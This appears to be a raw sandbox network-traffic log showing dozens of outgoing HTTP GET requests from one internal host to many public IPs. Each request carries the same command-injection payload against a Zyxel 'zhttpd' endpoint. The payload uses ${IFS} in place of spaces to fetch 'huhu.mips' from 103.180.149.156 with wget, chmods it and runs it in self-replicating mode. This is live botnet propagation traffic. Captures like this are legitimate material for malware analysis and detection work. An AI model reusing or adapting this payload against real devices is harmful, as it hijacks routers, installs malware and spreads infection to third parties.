                                                        Feb 2, 2024 06:21:19.117904902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6772192.168.2.1449596175.123.176.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117927074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6773192.168.2.145914067.37.68.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118000984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6774192.168.2.1451648172.172.183.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118021965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6775192.168.2.1439546166.16.124.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118060112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6776192.168.2.144817892.156.172.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118083000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6777192.168.2.1435912168.33.116.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118118048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6778192.168.2.144736844.186.9.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118160963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6779192.168.2.1433134156.188.133.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118210077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6780192.168.2.1460660164.188.19.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118258953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6781192.168.2.145992869.26.45.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118302107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6782192.168.2.1435182181.180.2.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118352890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6783192.168.2.143422052.128.190.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118387938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6784192.168.2.1460702219.97.228.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118422985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6785192.168.2.1454664187.71.196.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118455887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6786192.168.2.144185299.93.147.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118505955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6787192.168.2.1447036150.134.20.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118544102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6788192.168.2.1441310213.0.75.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118583918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6789192.168.2.144618065.135.94.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118622065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6790192.168.2.1447228153.223.65.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118639946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6791192.168.2.1460566116.89.141.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118696928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6792192.168.2.1451290168.47.225.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118721962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6793192.168.2.1449792186.58.222.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118762016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6794192.168.2.1445108191.1.202.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118798971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6795192.168.2.144905278.176.7.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118868113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6796192.168.2.146058290.4.152.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118917942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6797192.168.2.144237227.178.176.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118943930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6798192.168.2.1438462220.65.171.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.118984938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6799192.168.2.1448276195.116.47.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119025946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6800192.168.2.1452242201.57.214.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119062901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6801192.168.2.1447596119.162.89.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119110107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6802192.168.2.1447354122.236.99.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119138956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6803192.168.2.144452282.50.108.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119183064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6804192.168.2.1458718146.57.166.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119209051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6805192.168.2.143485025.80.14.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119256020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6806192.168.2.143578694.7.166.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119299889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6807192.168.2.1443562148.42.247.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119340897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6808192.168.2.1457312121.134.113.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119383097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6809192.168.2.1434320167.206.1.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119412899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6810192.168.2.1436088179.127.148.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119460106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6811192.168.2.143767453.126.103.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119481087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6812192.168.2.145344881.171.109.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119518042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6813192.168.2.1445198129.220.107.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.119579077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6814192.168.2.1445038184.120.222.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129385948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6815192.168.2.145627458.145.23.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129415989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6816192.168.2.1460630212.167.225.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129470110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6817192.168.2.1460930162.98.101.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129517078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6818192.168.2.144076046.4.188.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129538059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6819192.168.2.1447544152.97.151.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129606962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6820192.168.2.1437458146.59.87.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129643917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6821192.168.2.145515286.48.44.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129681110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6822192.168.2.144778617.1.158.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129749060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6823192.168.2.1433692183.8.202.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129787922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6824192.168.2.144720274.52.134.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129829884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6825192.168.2.1451732173.77.202.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129897118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6826192.168.2.143374470.44.159.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129903078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6827192.168.2.144468264.247.167.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129939079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6828192.168.2.143350218.197.51.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.129981995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6829192.168.2.1458782156.74.171.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130003929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6830192.168.2.1454198182.146.3.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130053997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6831192.168.2.144392859.24.189.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130081892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6832192.168.2.143980064.31.96.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130131960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6833192.168.2.145665891.187.105.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130187988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6834192.168.2.1456398154.182.158.16443
                                                        TimestampBytes transferredDirectionData
